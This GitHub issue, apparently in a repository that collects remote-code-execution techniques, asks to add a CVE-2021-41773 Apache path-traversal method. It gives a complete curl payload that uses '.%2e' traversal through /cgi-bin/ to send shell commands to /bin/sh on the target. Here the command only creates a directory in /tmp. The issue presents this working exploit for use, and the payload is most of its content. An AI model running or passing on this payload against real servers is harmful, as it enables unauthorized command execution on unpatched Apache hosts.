Skip to content

[add-request] CVE-2021-41773 - Apache2 Path Trasversal (.%2e) to RCE through /cgi-bin/ #10

Description

@wlayzz

Adding rce technique on apache2, payload:
curl "http://url.com/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh" --data 'echo Content-Type: text/plain; echo; mkdir /tmp/poda/'

Activity

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Metadata

Metadata

Assignees

Labels

add-requestRequest a new RCE technique

Projects

No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions